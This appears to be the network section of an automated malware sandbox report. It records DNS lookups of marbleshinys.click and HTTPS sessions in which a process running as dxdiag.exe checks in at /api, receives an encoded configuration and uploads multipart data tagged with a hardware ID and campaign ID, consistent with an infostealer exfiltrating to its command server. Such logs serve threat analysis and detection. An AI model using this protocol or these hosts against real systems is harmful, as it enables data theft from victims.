                                                                                Dec 30, 2024 15:55:41.627238989 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.627338886 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.627392054 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.628068924 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.628084898 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.628101110 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.628107071 CET44364270172.67.148.118192.168.2.11
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 30, 2024 15:55:16.442837000 CET  57847        53         192.168.2.11  1.1.1.1
Dec 30, 2024 15:55:16.464736938 CET  53           57847      1.1.1.1       192.168.2.11
Dec 30, 2024 15:55:33.819305897 CET  53           56160      1.1.1.1       192.168.2.11

Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 30, 2024 15:55:16.442837000 CET  192.168.2.11  1.1.1.1  0xa5bf    Standard query (0)  marbleshinys.click  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Dec 30, 2024 15:55:16.464736938 CET  1.1.1.1    192.168.2.11  0xa5bf    No error (0)  marbleshinys.click         172.67.148.118  A (IP address)  IN (0x0001)  false
Dec 30, 2024 15:55:16.464736938 CET  1.1.1.1    192.168.2.11  0xa5bf    No error (0)  marbleshinys.click         104.21.47.149   A (IP address)  IN (0x0001)  false

• marbleshinys.click
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.11  49756        172.67.148.118  443               8016  C:\Windows\SysWOW64\dxdiag.exe

Timestamp | Bytes transferred | Direction | Data

2024-12-30 14:55:17 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marbleshinys.click

2024-12-30 14:55:17 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2024-12-30 14:55:29 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 14:55:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=be0hdlkoo4lnn0n7ea1nv2fl4o; expires=Fri, 25 Apr 2025 08:42:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KTdGUfh%2FxbYPuy1p5cdil%2BRGxscEzwZU7e8R6Q3to1n8wNGdslmecQu4zEKySywgBJHYT%2BPCohrFnnFgvC14TVomlx89d5kDin9KEo5ttfcfqii7opv1bNvU0fDXqtLT7h6y6o0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa2deb62a5a7ced-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1836&rtt_var=713&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1509824&cwnd=179&unsent_bytes=0&cid=81f461816bdbfa75&ts=12081&x=0"

2024-12-30 14:55:29 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

2024-12-30 14:55:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.11  49837        172.67.148.118  443               8016  C:\Windows\SysWOW64\dxdiag.exe

Timestamp | Bytes transferred | Direction | Data

2024-12-30 14:55:29 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 45
Host: marbleshinys.click

2024-12-30 14:55:29 UTC | 45 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=

2024-12-30 14:55:30 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 14:55:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=573cbd56oqhem4s53nt8jiariv; expires=Fri, 25 Apr 2025 08:42:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpBJe0klMcJG6RUzs6kilOWzdmXxxamIiXPTUxLsuuOsZADYQp1VxSTuJ6PXw%2F8Fnjo2sx23yCmE%2FmPsRY%2FeFAN%2FTjlU9P4%2F7DALHIwI6WO4WnocvltRwJAUpi3ioEC7UBwDohY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa2df021bb6c45e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1719&rtt_var=647&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=947&delivery_rate=1698662&cwnd=243&unsent_bytes=0&cid=f7db7e0fb0b68896&ts=502&x=0"
                                                                                2024-12-30 14:55:30 UTC238INData Raw: 34 36 32 0d 0a 4e 71 30 69 4f 47 71 4a 72 73 64 43 63 61 37 2f 6f 4c 32 71 4a 6a 65 7a 48 63 59 5a 6e 55 36 6d 54 75 70 4f 62 36 54 6c 2b 74 74 4e 6a 31 51 61 55 4c 32 43 35 54 45 55 6a 4d 58 55 7a 39 39 44 47 35 46 38 6f 6a 75 6e 4b 4d 63 69 6d 53 74 44 68 70 4f 58 2b 51 7a 4c 51 31 51 5a 37 49 4c 6c 4a 77 6d 4d 78 66 76 47 69 45 4e 5a 6b 53 66 6b 66 50 63 73 78 79 4b 49 4c 77 54 4c 6c 5a 61 34 58 73 46 46 55 41 2f 71 79 71 59 75 48 4d 75 61 78 64 7a 41 53 46 37 65 64 61 73 37 73 57 7a 44 4e 4d 68 30 54 65 6d 41 6a 72 70 37 7a 46 46 54 53 50 53 43 76 47 41 55 77 4e 32 61 6e 38 74 44 56 64 39 37 6f 6e 4c 31 4a 73 34 71 69 53 6f 46 31 49 79 63 73 31 37 50 52 6c 45 46 34 39 36 72 4a 42 76 41 6e 4d 2f 63 69
                                                                                Data Ascii: 462Nq0iOGqJrsdCca7/oL2qJjezHcYZnU6mTupOb6Tl+ttNj1QaUL2C5TEUjMXUz99DG5F8ojunKMcimStDhpOX+QzLQ1QZ7ILlJwmMxfvGiENZkSfkfPcsxyKILwTLlZa4XsFFUA/qyqYuHMuaxdzASF7edas7sWzDNMh0TemAjrp7zFFTSPSCvGAUwN2an8tDVd97onL1Js4qiSoF1Iycs17PRlEF496rJBvAnM/ci
                                                                                2024-12-30 14:55:30 UTC891INData Raw: 41 6f 56 31 6d 66 6b 49 37 39 2f 39 69 2b 5a 50 52 6a 4c 6c 35 37 35 53 34 46 5a 47 67 2f 6e 6a 50 31 67 47 38 43 54 78 39 7a 48 51 31 54 52 62 61 74 37 2f 43 54 4d 4b 49 49 6a 41 73 6d 4a 6b 72 35 63 78 6b 64 56 44 2b 50 4b 71 69 4e 54 67 74 33 46 78 34 67 63 46 66 46 76 70 33 6a 72 49 64 56 73 6c 32 49 55 68 6f 43 55 2b 51 79 50 52 6c 51 4a 35 73 79 33 4b 42 6a 48 6d 4e 44 55 77 55 6c 59 30 58 4b 75 64 50 77 73 77 79 61 43 49 77 66 43 69 70 57 2f 56 4d 38 41 46 45 6a 73 31 4f 56 34 55 2b 2b 59 30 74 6a 45 55 68 66 72 50 37 73 31 35 6d 7a 44 49 4d 68 30 54 63 36 43 6d 37 70 66 77 45 4e 53 41 2f 6e 4d 74 79 59 65 79 59 2f 45 32 73 5a 4f 56 73 4e 31 71 6e 33 38 4a 63 38 6c 6a 53 73 4a 68 73 6e 59 76 6b 79 50 47 42 6f 70 35 73 65 70 4b 67 54 4d 33 64 32 52
                                                                                Data Ascii: AoV1mfkI79/9i+ZPRjLl575S4FZGg/njP1gG8CTx9zHQ1TRbat7/CTMKIIjAsmJkr5cxkdVD+PKqiNTgt3Fx4gcFfFvp3jrIdVsl2IUhoCU+QyPRlQJ5sy3KBjHmNDUwUlY0XKudPwswyaCIwfCipW/VM8AFEjs1OV4U++Y0tjEUhfrP7s15mzDIMh0Tc6Cm7pfwENSA/nMtyYeyY/E2sZOVsN1qn38Jc8ljSsJhsnYvkyPGBop5sepKgTM3d2R
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 34 35 33 32 0d 0a 2f 48 69 38 58 50 2f 55 64 62 33 33 69 79 4f 2b 42 69 33 57 79 50 49 45 32 65 78 35 65 32 57 38 64 41 57 77 7a 6d 79 4b 51 74 48 38 57 65 7a 74 50 41 53 56 6e 56 63 4b 78 7a 2f 43 54 57 49 6f 59 71 43 38 61 43 32 50 63 55 79 46 67 61 55 4b 76 6f 71 7a 63 48 78 39 2f 33 33 4d 5a 4b 55 73 63 2f 75 7a 58 6d 62 4d 4d 67 79 48 52 4e 79 49 71 54 74 56 50 47 51 56 6b 49 34 63 4b 71 4b 68 76 45 6e 63 2f 65 77 30 78 54 33 48 53 72 64 50 67 6b 78 79 43 4e 49 51 36 47 79 64 69 2b 54 49 38 59 47 69 33 6c 7a 37 51 78 55 66 6d 65 7a 4e 48 50 55 68 58 4f 4d 62 30 37 2b 43 43 45 64 4d 67 6d 43 73 47 44 6c 62 4e 58 79 30 52 58 42 2b 4c 46 72 44 49 5a 77 4a 50 51 30 73 4a 42 57 39 31 36 71 33 76 2b 4c 63 6f 6d 67 32 78 44 68 6f 43 41 2b 51 79 50 62 31 63
                                                                                Data Ascii: 4532/Hi8XP/Udb33iyO+Bi3WyPIE2ex5e2W8dAWwzmyKQtH8WeztPASVnVcKxz/CTWIoYqC8aC2PcUyFgaUKvoqzcHx9/33MZKUsc/uzXmbMMgyHRNyIqTtVPGQVkI4cKqKhvEnc/ew0xT3HSrdPgkxyCNIQ6Gydi+TI8YGi3lz7QxUfmezNHPUhXOMb07+CCEdMgmCsGDlbNXy0RXB+LFrDIZwJPQ0sJBW916q3v+Lcomg2xDhoCA+QyPb1c
                                                                                2024-12-30 14:55:30 UTC1369INData Raw: 79 46 54 67 74 33 46 78 34 67 63 46 66 35 38 73 6e 47 2f 4d 34 6f 31 79 43 73 42 68 74 2f 59 73 31 6a 4c 51 31 59 42 35 38 47 6b 4a 42 54 42 6d 63 4c 5a 7a 6b 46 55 32 6e 65 6f 64 50 55 67 77 43 43 42 4b 67 48 46 68 4a 37 35 47 6f 39 48 51 6b 69 7a 6a 49 51 74 47 4d 43 64 77 63 37 50 42 42 75 52 63 61 4a 37 76 33 54 53 50 4a 38 72 45 6f 69 65 32 4c 35 59 6a 78 67 61 41 76 6e 4a 71 79 51 5a 79 5a 6e 4f 31 63 68 42 52 39 6c 35 6f 33 66 33 4b 63 73 71 6a 53 45 4b 7a 59 53 4b 71 31 66 4c 54 6c 5a 49 70 59 79 69 4f 46 4f 55 33 65 66 49 79 31 52 54 30 6a 2b 37 4e 65 5a 73 77 79 44 49 64 45 33 47 69 5a 53 79 55 38 52 4c 58 67 7a 72 77 61 34 75 48 63 57 52 79 74 50 50 56 6c 6a 55 64 36 35 79 2b 69 44 4a 4c 35 6f 76 44 49 62 4a 32 4c 35 4d 6a 78 67 61 4c 39 6a 37
                                                                                Data Ascii: yFTgt3Fx4gcFf58snG/M4o1yCsBht/Ys1jLQ1YB58GkJBTBmcLZzkFU2neodPUgwCCBKgHFhJ75Go9HQkizjIQtGMCdwc7PBBuRcaJ7v3TSPJ8rEoie2L5YjxgaAvnJqyQZyZnO1chBR9l5o3f3KcsqjSEKzYSKq1fLTlZIpYyiOFOU3efIy1RT0j+7NeZswyDIdE3GiZSyU8RLXgzrwa4uHcWRytPPVljUd65y+iDJL5ovDIbJ2L5MjxgaL9j7
                                                                                2024-12-30 14:55:30 UTC | 1369 | IN | Data Raw: 7a 54 67 74 6a 51 42 41 32 52 55 36 64 30 39 47 7a 62 59 70 46 73 43 73 72 48 77 50 6c 54 78 30 68 55 43 2b 33 48 71 53 77 53 78 5a 76 48 31 38 39 4c 55 74 68 34 70 48 33 74 4b 38 6b 6c 69 43 63 45 7a 49 4f 5a 73 68 53 42 41 46 30 51 71 35 54 6c 45 68 54 61 6a 63 47 66 31 77 70 4d 6b 58 69 6f 4f 36 64 73 79 54 36 4a 4b 52 2f 43 69 4a 4f 72 58 38 6c 41 58 78 72 73 77 4b 38 76 45 4d 53 51 77 64 66 61 52 46 6a 52 62 62 5a 39 39 43 4b 45 59 73 67 72 46 59 62 66 32 49 68 44 78 41 42 46 52 76 4b 4d 6f 69 78 54 6c 4e 33 42 31 63 56 4b 52 39 56 35 72 33 6a 78 4a 4d 45 6b 6a 43 59 41 79 59 79 53 73 46 7a 50 54 31 38 41 34 4d 71 72 49 52 58 41 6b 49 4b 52 69 45 4e 4e 6b 53 66 6b 58 4f 55 68 77 6a 75 5a 47 51 72 47 31 74 69 6d 47 74 59 41 58 51 53 72 6c 4f 55 74 48
                                                                                Data Ascii: zTgtjQBA2RU6d09GzbYpFsCsrHwPlTx0hUC+3HqSwSxZvH189LUth4pH3tK8kliCcEzIOZshSBAF0Qq5TlEhTajcGf1wpMkXioO6dsyT6JKR/CiJOrX8lAXxrswK8vEMSQwdfaRFjRbbZ99CKEYsgrFYbf2IhDxABFRvKMoixTlN3B1cVKR9V5r3jxJMEkjCYAyYySsFzPT18A4MqrIRXAkIKRiENNkSfkXOUhwjuZGQrG1timGtYAXQSrlOUtH
                                                                                2024-12-30 14:55:30 UTC | 1369 | IN | Data Raw: 2f 78 56 34 56 7a 6a 47 39 4f 2f 67 67 68 48 54 49 49 67 44 41 68 70 6d 78 58 4d 39 47 55 41 7a 6f 78 61 59 6e 47 73 71 57 77 64 58 48 51 31 50 56 66 36 39 38 38 53 72 42 4a 34 46 73 51 34 61 41 67 50 6b 4d 6a 32 5a 35 47 76 6e 2b 71 79 4d 49 6a 49 4b 4d 78 6f 68 44 57 5a 45 6e 35 48 44 33 49 39 59 70 67 53 51 4a 7a 34 65 63 73 31 6e 49 51 46 38 46 37 73 69 72 4a 42 54 4d 6b 63 33 59 77 45 74 52 30 58 44 6b 4e 62 38 72 33 47 7a 51 62 43 33 4e 6b 62 6d 33 58 39 30 41 52 55 62 79 6a 4b 49 73 55 35 54 64 7a 4e 62 4a 54 46 76 64 64 36 42 70 2f 79 66 4e 49 34 6b 6a 44 63 57 47 6b 72 46 47 79 55 42 52 41 4f 7a 45 6f 53 34 42 7a 5a 4b 43 6b 59 68 44 54 5a 45 6e 35 45 72 70 4b 38 4d 6a 79 67 55 4b 33 59 61 53 75 6c 2f 44 41 45 56 47 38 6f 79 69 4c 46 4f 55 33 63
                                                                                Data Ascii: /xV4VzjG9O/gghHTIIgDAhpmxXM9GUAzoxaYnGsqWwdXHQ1PVf6988SrBJ4FsQ4aAgPkMj2Z5Gvn+qyMIjIKMxohDWZEn5HD3I9YpgSQJz4ecs1nIQF8F7sirJBTMkc3YwEtR0XDkNb8r3GzQbC3Nkbm3X90ARUbyjKIsU5TdzNbJTFvdd6Bp/yfNI4kjDcWGkrFGyUBRAOzEoS4BzZKCkYhDTZEn5ErpK8MjygUK3YaSul/DAEVG8oyiLFOU3c
                                                                                2024-12-30 14:55:30 UTC | 1369 | IN | Data Raw: 47 38 67 2f 6f 33 65 2f 64 49 51 6e 68 69 6b 4d 79 6f 32 66 74 30 62 4f 53 6c 59 4a 37 4d 75 75 4d 68 6a 65 6c 73 72 63 78 6b 78 63 30 58 47 6b 65 76 49 73 68 47 4c 49 4b 78 57 47 33 39 69 63 64 39 68 57 55 45 72 49 32 37 4d 71 46 4d 43 4c 79 64 37 4c 55 6c 6a 42 50 2b 6f 37 37 69 76 56 62 4e 41 36 48 64 47 41 68 2f 64 4e 6a 30 64 57 53 4c 4f 4d 72 69 38 64 77 5a 62 47 31 73 31 4d 56 74 52 36 72 6e 66 7a 4c 63 77 6c 67 69 6b 49 77 49 32 62 74 31 76 4f 54 46 34 42 35 63 58 6c 62 6c 50 4c 68 59 4b 48 69 48 4a 46 31 6d 65 70 61 37 30 65 78 7a 32 5a 4f 51 44 57 67 64 71 57 56 38 4e 44 58 77 2f 37 6a 4c 70 75 43 6f 79 61 7a 70 2b 51 42 46 58 56 63 36 64 38 38 53 50 4a 49 34 38 6e 41 73 79 4a 69 72 5a 52 78 30 78 53 42 66 6e 47 72 7a 49 61 78 5a 44 4d 31 39 70
                                                                                Data Ascii: G8g/o3e/dIQnhikMyo2ft0bOSlYJ7MuuMhjelsrcxkxc0XGkevIshGLIKxWG39icd9hWUErI27MqFMCLyd7LUljBP+o77ivVbNA6HdGAh/dNj0dWSLOMri8dwZbG1s1MVtR6rnfzLcwlgikIwI2bt1vOTF4B5cXlblPLhYKHiHJF1mepa70exz2ZOQDWgdqWV8NDXw/7jLpuCoyazp+QBFXVc6d88SPJI48nAsyJirZRx0xSBfnGrzIaxZDM19p
                                                                                2024-12-30 14:55:30 UTC | 1369 | IN | Data Raw: 2b 6f 37 38 47 79 63 46 63 68 6b 54 66 6e 4a 32 4b 45 55 6c 77 42 76 43 2b 58 43 6f 6a 59 43 67 62 7a 50 31 4d 52 4a 57 74 6f 2f 36 6a 76 35 62 4a 78 38 78 6d 77 4a 31 38 66 41 36 51 61 55 46 51 6c 66 75 35 36 36 62 67 71 4d 69 34 4b 48 6d 67 6f 56 77 7a 2f 38 4f 37 67 76 31 6a 36 4f 4c 78 76 46 77 4b 61 48 64 39 68 57 55 42 4f 70 36 71 49 78 47 74 71 51 30 4f 48 32 61 6c 6a 51 66 4b 6f 35 7a 6a 72 4a 50 49 73 70 43 76 69 35 6c 72 35 41 79 45 35 63 43 4b 75 43 35 53 39 54 6c 4b 53 43 6c 34 68 37 47 35 46 6e 35 43 4f 2f 47 63 63 69 68 69 73 62 31 38 71 37 72 6b 4c 46 57 78 67 75 37 4e 32 73 4e 68 37 65 33 59 79 66 7a 67 51 4e 67 54 48 6b 66 2b 35 73 6e 48 7a 61 64 31 69 56 30 4d 6a 72 53 34 46 5a 47 68 36 72 6c 50 64 75 55 39 37 64 6d 70 2b 50 52 30 66 44
                                                                                Data Ascii: +o78GycFchkTfnJ2KEUlwBvC+XCojYCgbzP1MRJWto/6jv5bJx8xmwJ18fA6QaUFQlfu566bgqMi4KHmgoVwz/8O7gv1j6OLxvFwKaHd9hWUBOp6qIxGtqQ0OH2aljQfKo5zjrJPIspCvi5lr5AyE5cCKuC5S9TlKSCl4h7G5Fn5CO/Gccihisb18q7rkLFWxgu7N2sNh7e3YyfzgQNgTHkf+5snHzad1iV0MjrS4FZGh6rlPduU97dmp+PR0fD
                                                                                2024-12-30 14:55:30 UTC | 1369 | IN | Data Raw: 39 30 6c 32 4c 49 4b 42 79 47 33 38 6a 72 44 35 6f 54 44 56 69 35 30 2b 73 35 55 39 72 64 6d 6f 32 47 42 45 65 52 4a 2b 51 38 2f 44 37 57 4b 6f 73 36 44 6f 47 35 70 6f 78 58 77 55 35 64 48 74 37 50 74 43 4d 54 78 36 50 38 2f 73 5a 50 55 74 31 70 6d 6b 58 4b 4c 38 6f 69 6a 7a 6f 63 68 73 6e 59 74 68 53 58 65 52 70 41 71 2f 50 72 59 41 75 4d 78 59 4c 71 79 30 70 62 31 6d 6d 31 4e 73 6f 76 31 53 2b 49 4a 30 32 49 78 35 37 35 44 4a 30 4f 47 67 7a 36 6a 50 31 77 51 5a 66 49 6b 59 69 59 46 6b 71 66 5a 75 52 74 76 33 53 57 59 73 67 2b 54 5a 37 48 33 37 70 47 33 55 5a 5a 48 75 69 4c 6d 78 34 31 7a 35 72 45 33 4d 5a 54 52 4a 4e 51 70 33 44 7a 49 4d 4d 36 74 68 49 59 78 59 6d 57 76 6b 4c 65 41 42 52 49 35 49 7a 39 47 56 50 64 6c 38 57 54 67 41 68 45 77 6e 47 76 62
                                                                                Data Ascii: 90l2LIKByG38jrD5oTDVi50+s5U9rdmo2GBEeRJ+Q8/D7WKos6DoG5poxXwU5dHt7PtCMTx6P8/sZPUt1pmkXKL8oijzochsnYthSXeRpAq/PrYAuMxYLqy0pb1mm1Nsov1S+IJ02Ix575DJ0OGgz6jP1wQZfIkYiYFkqfZuRtv3SWYsg+TZ7H37pG3UZZHuiLmx41z5rE3MZTRJNQp3DzIMM6thIYxYmWvkLeABRI5Iz9GVPdl8WTgAhEwnGvb


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.2.11 | 49845 | 172.67.148.118 | 443 | 8016 | C:\Windows\SysWOW64\dxdiag.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-12-30 14:55:31 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=ET1RU0B9LQR8S4C3
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 12833
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:31 UTC | 12833 | OUT | Data Raw: 2d 2d 45 54 31 52 55 30 42 39 4c 51 52 38 53 34 43 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 45 54 31 52 55 30 42 39 4c 51 52 38 53 34 43 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 54 31 52 55 30 42 39 4c 51 52 38 53 34 43 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 45 54 31 52
                                                                                Data Ascii: --ET1RU0B9LQR8S4C3Content-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--ET1RU0B9LQR8S4C3Content-Disposition: form-data; name="pid"2--ET1RU0B9LQR8S4C3Content-Disposition: form-data; name="lid"ZqchOa--new--ET1R
                                                                                2024-12-30 14:55:31 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=c3bhhr49un6o0575opclllg4b7; expires=Fri, 25 Apr 2025 08:42:10 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRlYAFKfet8CrgfVDaar3t%2FgqQzvMTebihFyahzWLKQ2DR4lEp2elTFSItlvJnqcSiOrjIPN1ZC61P3qgaeJGavjsguI8vgpCpgLDapS5vxgiAloicoT6eoeassDo%2FGnGwURalI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df0b59840c76-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2165&min_rtt=1712&rtt_var=965&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13773&delivery_rate=1705607&cwnd=151&unsent_bytes=0&cid=6de0f284277b11c1&ts=757&x=0"
                                                                                2024-12-30 14:55:31 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                3 | 192.168.2.11 | 49858 | 172.67.148.118 | 443 | 8016 | C:\Windows\SysWOW64\dxdiag.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-12-30 14:55:32 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=NZUOHX8B8FU
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 15015
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:32 UTC | 15015 | OUT | Data Raw: 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 4e 5a 55 4f 48 58 38 42 38 46 55 0d 0a 43 6f 6e 74 65 6e
                                                                                Data Ascii: --NZUOHX8B8FUContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--NZUOHX8B8FUContent-Disposition: form-data; name="pid"2--NZUOHX8B8FUContent-Disposition: form-data; name="lid"ZqchOa--new--NZUOHX8B8FUConten
                                                                                2024-12-30 14:55:32 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=pemlajusneru9ab1a8qb3pf4oe; expires=Fri, 25 Apr 2025 08:42:11 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUeRtVqGfFF%2BIsOAZPJ4EliqFFYS6DI%2FhFUOd1XirXRrn3CMbivYMKhDtnY5oH2PreMKjr9YW3Ph3rg9XooGTUKCBc9optMlFpZ%2F2987Ylenum7R2Wlygxv7f1ODJeYX37kDEwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df13ff26433a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
